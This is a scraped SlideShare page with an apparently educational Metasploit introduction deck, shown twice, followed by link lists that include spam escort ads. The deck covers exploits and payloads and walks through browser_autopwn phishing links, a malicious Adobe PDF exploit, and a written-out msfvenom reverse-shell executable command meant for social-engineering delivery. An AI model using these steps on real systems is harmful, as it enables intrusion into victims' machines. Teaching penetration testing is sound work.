SlideShare uma empresa Scribd logo

Metasploit (Module-1) - Getting Started With Metasploit

Transferir como PPTX, PDF
Anurag Srivastava
Anurag Srivastava

Metasploit is a vulnerability and exploitation framework used by security professionals to ease the burden of performing security assessments. It contains modules divided into exploits, auxiliary, payloads, and post exploitation that allow penetration testing functionality. Some techniques demonstrated in the document include browser, PDF, and executable exploitation using Metasploit payloads to gain remote access shells on target systems.

Apresentações e oratória
1 de 25
Metasploit Module 1 By- Anurag Srivastava
AGENDA • Introduction to Metasploit • History of Metasploit • Exploit • Payloads • Auxiliary • Network Reconnaissance with Metasploit • Metasploit Payload • Meterpreter and Post Exploitation • Client-side Exploitation – Browser , pdf and exe • References
Introduction to Metasploit • Vulnerability and exploitation framework designed to ease the burden on security professionals when it comes to performing security assessments. • One of the single most useful auditing tools freely available to security professionals today • Contains an extensive library of "modules.“ • Each module has a function, and they are divided up into "exploits", "auxiliary", "post" (post exploitation), "payloads", "encoders", and "nops.
History • Created by H. D. Moore in 2003 as a portable network tool using Perl • In April, 2004 - With the help of Spoonm, HD released a total rewrite of the project, Metasploit 2.0 (19 exploits and 27 payloads). • By 2007, the Metasploit Framework had been completely rewritten in Ruby • On October 21, 2009, it had been acquired by Rapid7
Exploits • Vectors for Penetrating the systems . • A software program that has been developed to attack an asset by taking advantage of a vulnerability. • Objective of many exploits is to gain control over an asset .
Payloads • A payload in metasploit refers to an exploit module. • Each exploit can be attached with various payloads like reverse or bind shells, the meterpreter shell etc. • A payload is a piece of code to be executed through said exploit.
Auxiliary • Metasploit Framework includes hundreds of auxiliary modules that perform scanning, fuzzing, sniffing, and much more. • Although these modules will not give you a shell, they are extremely valuable when conducting a penetration test.
Network Reconnaissance with Metasploit • Foundation for any successful penetration test is solid reconnaissance . • Gathering enough Information regarding the Target . • Some examples of Reconnaissance is using nmap tool for port scanning and identifying services running on the target system .
Metasploit Payloads • Mainly three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages. • Singles -Self-Contained and Completely Standalone which can be something as simple as adding a user to the target system or running calc.exe. • Stagers -Setup a network connection between the attacker and victim and are designed to be small and reliable • Stages -payload components that are downloaded by Stagers modules. Stages provide advanced features with no size limits such as Meterpreter, VNC Injection, and the iPhone ‘ipwn’ Shell.
Meterpreter and Post Exploitation • Meterpreter is an advanced, dynamically extensible payload that uses in- memory DLL injection stagers and is extended over the network at runtime. • Meterpreter communicates over the stager socket and provides a comprehensive client-side Ruby API. • Post-Exploitation is done after the exploitation in-order to maintain the control of the compromised system for future use . • Post-Exploitation includes setting up a backdoor to maintain more permanent system access and covering the tracks .
Client-side Exploitation • Client side attacks require user-interaction such as enticing them to click a link, open a document, or somehow get to your malicious website. • These types of attacks are often delivered by using cleverly worded emails, sometimes with attachments such as Microsoft Word and PDF documents. • Often the attacks is used in conjunction with social engineering techniques by way of phishing or spear phishing attacks.
Browser Exploitation • Browser Exploitation involves running a browser exploit inorder to take advantage of a flaw or vulnerability in an operating system or piece of software with the intent to breach browser security to alter a user's browser settings without their knowledge. • Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code.
In order to use this attack we have to open the metasploit framework and to use the browser_autopwn module.
Set up the LHOST with your IP address,the SRVPORT with the port 80 (otherwise the link that we have to send to the user must me in the format IP:8080) and the URIPATH with / in order to prevent metasploit to set up random URL’s.
Now we can share the link through our email to our client employees.If any user opens the malicious link,the autopwn module will try all these exploits in order to see if it can break into the client.If the browser is vulnerable to any of these exploits meterpreter sessions will open.
Pdf Exploitation • Exploiting a system using attacker’s crafted pdf file . • Mainly targets the system whose pdf reader is vulnerable to some sort of attacks like buffer overflow . • Pdf is distributed to the victims by social engineering techniques . • Sometimes the pdf application fails to perform adequate boundary checks on user-supplied data then thus system can be attacked by using pdf exploitation technique .
We are going to be using the Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer Overflow Vulnerability.
Once we have all the options set the way we want, we run “exploit” to create our malicious file. We will use msfconsole to set up our multi handler listener
Clicking the file opens Adobe but shows a greyed out window that never reveals a PDF. Instead, on the attackers machine a meterpreter session is opened and thus we have the shell on the victim system .
Exe Exploitation • Generate an executable from a Metasploit payload inorder to target a victim through malicious executable file . • If you can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any software. • Generate a reverse shell payload, execute it on a remote system, and get our shell. • Best way to do this is to backdoor an executable by embedding it with malicious payloads .
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe use ‘multi/handler’ which is a stub that handles exploits launched outside of the framework. run ‘exploit’ for the multi/handler and execute our generated executable on the victim.
The generated executable can be distributed using some sort of social engineering attacks thus as soon as the executable is executed on the victim system it presents the attacker with the shell of the victim system .
References • https://www.offensive-security.com/metasploit-unleashed/ • Mastering Metasploit by Nipun Jaswal . • http://hackeracademy.com/module/introduction-to-pdf-attacks • https://pentestlab.wordpress.com • https://community.rapid7.com/community/metasploit

Recomendados

Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
Raghav Bisht
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
Aashish R
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
Ashok Reddy Medikonda
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
devilback
 
Metasploit
MetasploitMetasploit
Metasploit
Lalith Sai
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
Mohammed Akbar Shariff
 
Metaploit
MetaploitMetaploit
Metaploit
Ajinkya Pathak
 

Recomendados

Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
Raghav Bisht
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
Aashish R
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
Ashok Reddy Medikonda
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
devilback
 
Metasploit
MetasploitMetasploit
Metasploit
Lalith Sai
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
Mohammed Akbar Shariff
 
Metaploit
MetaploitMetaploit
Metaploit
Ajinkya Pathak
 
Metasploit
MetasploitMetasploit
Metasploit
Institute of Information Security (IIS)
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
GTU
 
Metasploit
MetasploitMetasploit
Metasploit
henelpj
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
Mohammed Danish Amber
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
Hossein Yavari
 
Metasploit
MetasploitMetasploit
Metasploit
Parth Sahu
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
M.Syarifudin, ST, OSCP, OSWP
 
Foreman presentation
Foreman presentationForeman presentation
Foreman presentation
Glen Ogilvie
 
NMAP
NMAPNMAP
NMAP
PrateekAryan1
 
Thick Client Testing Basics
Thick Client Testing BasicsThick Client Testing Basics
Thick Client Testing Basics
NSConclave
 
Intrusion Detection Systems (IDS)
Intrusion Detection Systems (IDS)Intrusion Detection Systems (IDS)
Intrusion Detection Systems (IDS)
Hachmdhmdzad
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
Mostafa Abdel-sallam
 
BugBounty Tips.pdf
BugBounty Tips.pdfBugBounty Tips.pdf
BugBounty Tips.pdf
KhaledMohamed767546
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
Sagar M Parmar
 
BugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamBugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed Adam
Mohammed Adam
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
Arpit Agarwal
 
NMap
NMapNMap
NMap
Pritesh Raka
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing tool
medoelkang600
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
Amit Kumbhar
 

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

Metasploit
MetasploitMetasploit
Metasploit
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
 
Metasploit
MetasploitMetasploit
Metasploit
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
 
Metasploit
MetasploitMetasploit
Metasploit
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Foreman presentation
Foreman presentationForeman presentation
Foreman presentation
 
NMAP
NMAPNMAP
NMAP
 
Thick Client Testing Basics
Thick Client Testing BasicsThick Client Testing Basics
Thick Client Testing Basics
 
Intrusion Detection Systems (IDS)
Intrusion Detection Systems (IDS)Intrusion Detection Systems (IDS)
Intrusion Detection Systems (IDS)
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
BugBounty Tips.pdf
BugBounty Tips.pdfBugBounty Tips.pdf
BugBounty Tips.pdf
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
 
BugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamBugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed Adam
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
 
NMap
NMapNMap
NMap
 

Semelhante a Metasploit (Module-1) - Getting Started With Metasploit

Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
Amit Kumbhar
 
DefCamp 2013 - MSF Into The Worm Hole
DefCamp 2013 - MSF Into The Worm HoleDefCamp 2013 - MSF Into The Worm Hole
DefCamp 2013 - MSF Into The Worm Hole
DefCamp
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
Shellmates
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface Device
Positive Hack Days
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
Le Quyen
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
wozgeass
 

Semelhante a Metasploit (Module-1) - Getting Started With Metasploit (20)

Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing tool
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Metasploit Demo
 
DefCamp 2013 - MSF Into The Worm Hole
DefCamp 2013 - MSF Into The Worm HoleDefCamp 2013 - MSF Into The Worm Hole
DefCamp 2013 - MSF Into The Worm Hole
 
Metapwn
MetapwnMetapwn
Metapwn
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Introduction to metasploit
Introduction to metasploitIntroduction to metasploit
Introduction to metasploit
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface Device
 
Meta sploit (cyber security)
Meta sploit (cyber security) Meta sploit (cyber security)
Meta sploit (cyber security)
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
 
Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]
 
Open Source Cyber Weaponry
Open Source Cyber WeaponryOpen Source Cyber Weaponry
Open Source Cyber Weaponry
 
Metasploit
MetasploitMetasploit
Metasploit
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Ethical hacking basics
Ethical hacking basicsEthical hacking basics
Ethical hacking basics
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 

Último

Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
amilabibi1
 
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Delhi Call girls
 
Uncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac FolorunsoUncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac Folorunso
Kayode Fayemi
 
If this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New NigeriaIf this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New Nigeria
Kayode Fayemi
 
Sector 62, Noida Call girls :8448380779 Noida Escorts | 100% verified
Sector 62, Noida Call girls :8448380779 Noida Escorts | 100% verifiedSector 62, Noida Call girls :8448380779 Noida Escorts | 100% verified
Sector 62, Noida Call girls :8448380779 Noida Escorts | 100% verified
Delhi Call girls
 
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptxChiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
raffaeleoman
 

Último (18)

Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
 
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
 
Dreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video TreatmentDreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video Treatment
 
Uncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac FolorunsoUncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac Folorunso
 
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfAWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
 
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdfThe workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
 
If this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New NigeriaIf this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New Nigeria
 
Thirunelveli call girls Tamil escorts 7877702510
Thirunelveli call girls Tamil escorts 7877702510Thirunelveli call girls Tamil escorts 7877702510
Thirunelveli call girls Tamil escorts 7877702510
 
Sector 62, Noida Call girls :8448380779 Noida Escorts | 100% verified
Sector 62, Noida Call girls :8448380779 Noida Escorts | 100% verifiedSector 62, Noida Call girls :8448380779 Noida Escorts | 100% verified
Sector 62, Noida Call girls :8448380779 Noida Escorts | 100% verified
 
ICT role in 21st century education and it's challenges.pdf
ICT role in 21st century education and it's challenges.pdfICT role in 21st century education and it's challenges.pdf
ICT role in 21st century education and it's challenges.pdf
 
Digital collaboration with Microsoft 365 as extension of Drupal
Digital collaboration with Microsoft 365 as extension of DrupalDigital collaboration with Microsoft 365 as extension of Drupal
Digital collaboration with Microsoft 365 as extension of Drupal
 
Dreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio IIIDreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio III
 
My Presentation "In Your Hands" by Halle Bailey
My Presentation "In Your Hands" by Halle BaileyMy Presentation "In Your Hands" by Halle Bailey
My Presentation "In Your Hands" by Halle Bailey
 
Aesthetic Colaba Mumbai Cst Call girls 📞 7738631006 Grant road Call Girls ❤️-...
Aesthetic Colaba Mumbai Cst Call girls 📞 7738631006 Grant road Call Girls ❤️-...Aesthetic Colaba Mumbai Cst Call girls 📞 7738631006 Grant road Call Girls ❤️-...
Aesthetic Colaba Mumbai Cst Call girls 📞 7738631006 Grant road Call Girls ❤️-...
 
lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.
 
Causes of poverty in France presentation.pptx
Causes of poverty in France presentation.pptxCauses of poverty in France presentation.pptx
Causes of poverty in France presentation.pptx
 
Report Writing Webinar Training
Report Writing Webinar TrainingReport Writing Webinar Training
Report Writing Webinar Training
 
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptxChiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
 

Metasploit (Module-1) - Getting Started With Metasploit

  • 2. AGENDA • Introduction to Metasploit • History of Metasploit • Exploit • Payloads • Auxiliary • Network Reconnaissance with Metasploit • Metasploit Payload • Meterpreter and Post Exploitation • Client-side Exploitation – Browser , pdf and exe • References
  • 3.
  • 4. Introduction to Metasploit • Vulnerability and exploitation framework designed to ease the burden on security professionals when it comes to performing security assessments. • One of the single most useful auditing tools freely available to security professionals today • Contains an extensive library of "modules.“ • Each module has a function, and they are divided up into "exploits", "auxiliary", "post" (post exploitation), "payloads", "encoders", and "nops.
  • 5.
  • 6. History • Created by H. D. Moore in 2003 as a portable network tool using Perl • In April, 2004 - With the help of Spoonm, HD released a total rewrite of the project, Metasploit 2.0 (19 exploits and 27 payloads). • By 2007, the Metasploit Framework had been completely rewritten in Ruby • On October 21, 2009, it had been acquired by Rapid7
  • 7. Exploits • Vectors for Penetrating the systems . • A software program that has been developed to attack an asset by taking advantage of a vulnerability. • Objective of many exploits is to gain control over an asset .
  • 8. Payloads • A payload in metasploit refers to an exploit module. • Each exploit can be attached with various payloads like reverse or bind shells, the meterpreter shell etc. • A payload is a piece of code to be executed through said exploit.
  • 9. Auxiliary • Metasploit Framework includes hundreds of auxiliary modules that perform scanning, fuzzing, sniffing, and much more. • Although these modules will not give you a shell, they are extremely valuable when conducting a penetration test.
  • 10. Network Reconnaissance with Metasploit • Foundation for any successful penetration test is solid reconnaissance . • Gathering enough Information regarding the Target . • Some examples of Reconnaissance is using nmap tool for port scanning and identifying services running on the target system .
  • 11. Metasploit Payloads • Mainly three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages. • Singles -Self-Contained and Completely Standalone which can be something as simple as adding a user to the target system or running calc.exe. • Stagers -Setup a network connection between the attacker and victim and are designed to be small and reliable • Stages -payload components that are downloaded by Stagers modules. Stages provide advanced features with no size limits such as Meterpreter, VNC Injection, and the iPhone ‘ipwn’ Shell.
  • 12. Meterpreter and Post Exploitation • Meterpreter is an advanced, dynamically extensible payload that uses in- memory DLL injection stagers and is extended over the network at runtime. • Meterpreter communicates over the stager socket and provides a comprehensive client-side Ruby API. • Post-Exploitation is done after the exploitation in-order to maintain the control of the compromised system for future use . • Post-Exploitation includes setting up a backdoor to maintain more permanent system access and covering the tracks .
  • 13. Client-side Exploitation • Client side attacks require user-interaction such as enticing them to click a link, open a document, or somehow get to your malicious website. • These types of attacks are often delivered by using cleverly worded emails, sometimes with attachments such as Microsoft Word and PDF documents. • Often the attacks is used in conjunction with social engineering techniques by way of phishing or spear phishing attacks.
  • 14. Browser Exploitation • Browser Exploitation involves running a browser exploit inorder to take advantage of a flaw or vulnerability in an operating system or piece of software with the intent to breach browser security to alter a user's browser settings without their knowledge. • Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code.
  • 15. In order to use this attack we have to open the metasploit framework and to use the browser_autopwn module.
  • 16. Set up the LHOST with your IP address,the SRVPORT with the port 80 (otherwise the link that we have to send to the user must me in the format IP:8080) and the URIPATH with / in order to prevent metasploit to set up random URL’s.
  • 17. Now we can share the link through our email to our client employees.If any user opens the malicious link,the autopwn module will try all these exploits in order to see if it can break into the client.If the browser is vulnerable to any of these exploits meterpreter sessions will open.
  • 18. Pdf Exploitation • Exploiting a system using attacker’s crafted pdf file . • Mainly targets the system whose pdf reader is vulnerable to some sort of attacks like buffer overflow . • Pdf is distributed to the victims by social engineering techniques . • Sometimes the pdf application fails to perform adequate boundary checks on user-supplied data then thus system can be attacked by using pdf exploitation technique .
  • 19. We are going to be using the Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer Overflow Vulnerability.
  • 20. Once we have all the options set the way we want, we run “exploit” to create our malicious file. We will use msfconsole to set up our multi handler listener
  • 21. Clicking the file opens Adobe but shows a greyed out window that never reveals a PDF. Instead, on the attackers machine a meterpreter session is opened and thus we have the shell on the victim system .
  • 22. Exe Exploitation • Generate an executable from a Metasploit payload inorder to target a victim through malicious executable file . • If you can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any software. • Generate a reverse shell payload, execute it on a remote system, and get our shell. • Best way to do this is to backdoor an executable by embedding it with malicious payloads .
  • 23. msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe use ‘multi/handler’ which is a stub that handles exploits launched outside of the framework. run ‘exploit’ for the multi/handler and execute our generated executable on the victim.
  • 24. The generated executable can be distributed using some sort of social engineering attacks thus as soon as the executable is executed on the victim system it presents the attacker with the shell of the victim system .
  • 25. References • https://www.offensive-security.com/metasploit-unleashed/ • Mastering Metasploit by Nipun Jaswal . • http://hackeracademy.com/module/introduction-to-pdf-attacks • https://pentestlab.wordpress.com • https://community.rapid7.com/community/metasploit